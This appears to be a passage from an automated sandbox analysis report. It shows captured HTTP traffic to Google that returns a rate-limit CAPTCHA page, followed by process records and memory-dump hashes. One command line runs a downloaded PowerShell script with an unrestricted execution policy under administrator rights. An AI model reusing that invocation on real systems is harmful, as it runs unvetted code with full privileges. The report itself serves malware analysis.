                                                                Cookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS
                                                                Dec 22, 2024 13:48:14.233804941 CET1289INHTTP/1.1 429 Too Many Requests
                                                                Date: Sun, 22 Dec 2024 12:48:14 GMT
                                                                Pragma: no-cache
                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Content-Type: text/html
                                                                Server: HTTP server (unknown)
                                                                Content-Length: 3076
                                                                X-XSS-Protection: 0
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                Dec 22, 2024 13:48:14.233825922 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="DZAV9xlBBiDLgLjBpjD6dF2DPAg1vt4IEJCWyh9LPVtthuZY6r6DJPdVXkdsCi-C1CY_-3Ouy8mlFDo2_8VVhRXUITvB_3rXn-AZUZcbu42d3KMwcNDo1noiF5g9n3t9ze8sS3RXOCVsIRBExqOExmc
                                                                Dec 22, 2024 13:48:14.233840942 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:2
                                                                Start time:07:48:08
                                                                Start date:22/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                Imagebase:0x7ff7e00b0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:07:48:08
                                                                Start date:22/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff615190000
                                                                File size:875'008 bytes
                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f92b9ad46e434222dce4fc75ad5ad12184f9483bafc8634de301fd3856892aae
                                                                  • Instruction ID: 8c5779c78195c3997d793b372360e6b1255a51030e221d748ed6036db2bbf078
                                                                  • Opcode Fuzzy Hash: f92b9ad46e434222dce4fc75ad5ad12184f9483bafc8634de301fd3856892aae
                                                                  • Instruction Fuzzy Hash: C4F1A03190CA8D8FEBA8EF28CC557E977E1FB54310F44426EE84DC7291CA78A8458B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ae3f31c4cf9582014f9b2623dfecea5e14ce62d6c652d5ed122bbac04e0636c
                                                                  • Instruction ID: 0abf46d751399541a755d9f76874091802f819f1ef92c7d5137c2f1250040764
                                                                  • Opcode Fuzzy Hash: 4ae3f31c4cf9582014f9b2623dfecea5e14ce62d6c652d5ed122bbac04e0636c
                                                                  • Instruction Fuzzy Hash: BCE1A03190CA8E8FEBA8EF28CC557E977D1FB54310F1442AED84DC7695DE78A8418B81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !S_^$y7_
                                                                  • API String ID: 0-664470244
                                                                  • Opcode ID: 16592b2f2585ffb9c065dc1598f5c573afb0c3f746d4fa438e65fdea8eec0a5b
                                                                  • Instruction ID: 4c5aa03b9d318ff6cb0b73da3c944f7fff8c39587b7dd714c183998df84508ab
                                                                  • Opcode Fuzzy Hash: 16592b2f2585ffb9c065dc1598f5c573afb0c3f746d4fa438e65fdea8eec0a5b
                                                                  • Instruction Fuzzy Hash: 3D91D47390DBC55FE716EB2C6C662E5BFA0EF52224B0901FBD488CB197D99478098392
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663096803674.00007FF92AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92AF70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92af70000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e7da938d032b7f599e34ecf84683a183197a532a454e2078a5511b7dfcf008f
                                                                  • Instruction ID: 5fd524bcef1b0a408217aa874dcf364b5b6102a3d14c49b2a9c9a99f314d0d99
                                                                  • Opcode Fuzzy Hash: 3e7da938d032b7f599e34ecf84683a183197a532a454e2078a5511b7dfcf008f
                                                                  • Instruction Fuzzy Hash: AAF10033A0DA8A0FE7A6DB295C556B5BBE1EF56320F0901FAC08DC7193D958BD468341
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cac08346120c3cd60f0c179facc3c8c23c1a525ae492c54370db6210d7055d4a
                                                                  • Instruction ID: 35f7884a5897d87cd8b69aa555bb7582782f2c4c66b9927a58f17309131e0017
                                                                  • Opcode Fuzzy Hash: cac08346120c3cd60f0c179facc3c8c23c1a525ae492c54370db6210d7055d4a
                                                                  • Instruction Fuzzy Hash: 1FB1B37150CA8D4FEBA8EF28D8557E93BE1FF55310F14426EE84DC7292CA74A941CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663091633242.00007FF92ABAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ABAD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92abad000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c680a742a830893dbf3cebf09edd6119e10a26c751c9ec68fc53e676c57f8084
                                                                  • Instruction ID: 9bec64e29091ed2617ec98e039571b5c0504d4cf65ef80f8d4a809edf803644c
                                                                  • Opcode Fuzzy Hash: c680a742a830893dbf3cebf09edd6119e10a26c751c9ec68fc53e676c57f8084
                                                                  • Instruction Fuzzy Hash: 2041F17280DBC45FE756DB399C41A523FF0EF56220B1605EFD088CB1A7D625A846CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663096803674.00007FF92AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92AF70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92af70000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27f85e194d6d5302153b3b177f548f6304885cd4e006d39d4582f03dce9a6469
                                                                  • Instruction ID: ec502fdc1e4f94d5301b9131ef7bd3bbb475ef88651eb66d7b80e0baf74d59a0
                                                                  • Opcode Fuzzy Hash: 27f85e194d6d5302153b3b177f548f6304885cd4e006d39d4582f03dce9a6469
                                                                  • Instruction Fuzzy Hash: D531AE23D1DA464BE3A5D7195C953B8B6C2FF68320F5A01FAC48DC7192CD5DBD028286
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fcb5852c12787a2d16911c0b237577e3860c9685aa99db24403190e000ac1252
                                                                  • Instruction ID: dfecd774833de588ecbb7c7715a393a1460b61718f54e7703257c20a8988ee7a
                                                                  • Opcode Fuzzy Hash: fcb5852c12787a2d16911c0b237577e3860c9685aa99db24403190e000ac1252
                                                                  • Instruction Fuzzy Hash: 1421373190CB4C8FDB59EF9C9C4A7E97BE0EB96320F00416BD048C7156DAB0A44ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b19c01efb3c854d32d692dcb6aa92fc75716e52f5387b28f9f8a8d83b06022e8
                                                                  • Instruction ID: e1df508bad7de7dd6a2bd43f3cf5b5e771ec8d3fd2eb647c61f68dbd389b079c
                                                                  • Opcode Fuzzy Hash: b19c01efb3c854d32d692dcb6aa92fc75716e52f5387b28f9f8a8d83b06022e8
                                                                  • Instruction Fuzzy Hash: FA31D23181CA8E8EEBB4EB28CC1ABF93690FF45B19F410179D40DC6192CEB87985CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663096803674.00007FF92AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92AF70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92af70000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 946acb8ef5afc24467acf94513e9f0da0171c5a6a45ceabe4770367269009528
                                                                  • Instruction ID: 2c709855c52bcf77fb6af90bd50fc2b7cf78b65e7f0120c8bfcd1d700010bacb
                                                                  • Opcode Fuzzy Hash: 946acb8ef5afc24467acf94513e9f0da0171c5a6a45ceabe4770367269009528
                                                                  • Instruction Fuzzy Hash: 77119A33E1E9464FE7A5DB199C546F8BAD0FF45220F4A40FAC08DC70A6DA9CBD058B41
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6952197224450c694d6bcd7910d085a93a48b80f2725a7cab0c1c50179a7c92d
                                                                  • Instruction ID: ea70f28a61919a19373535fc60da940e356f1bf3fbd58b1b4e807b47c3501a9e
                                                                  • Opcode Fuzzy Hash: 6952197224450c694d6bcd7910d085a93a48b80f2725a7cab0c1c50179a7c92d
                                                                  • Instruction Fuzzy Hash: 7001447115CB0C4FD744EF0CE451AA5B7E0FB95324F50056EE58AC3651D636E881CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c601640b7b9f3b1a63915954f875d2237009bf4e57e8a8979442e26e0438dd99
                                                                  • Instruction ID: d35b168adabc49a24557cab6f1d7d536655ed54fcac6dcf312b461908fca4bb1
                                                                  • Opcode Fuzzy Hash: c601640b7b9f3b1a63915954f875d2237009bf4e57e8a8979442e26e0438dd99
                                                                  • Instruction Fuzzy Hash: 65F0BB3180C68D8FDB05EF288C195D9BFA0FF26311B0502DBD459C70A5DBB5A454CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.663092311003.00007FF92ACC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF92ACC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7ff92acc0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05a9cfd6d68a4a4864b077a77c89db47c43d89fad528904798419a649a25e599
                                                                  • Instruction ID: 1304f44b39dfafcb775b26202c80816790ce8fbc1d50a44809a669f9a94a063f
                                                                  • Opcode Fuzzy Hash: 05a9cfd6d68a4a4864b077a77c89db47c43d89fad528904798419a649a25e599
                                                                  • Instruction Fuzzy Hash: 7B02566790E6D24FF352C77DAC692E92FA1EF5222471E00F7C485DB0A3AD9D380A8751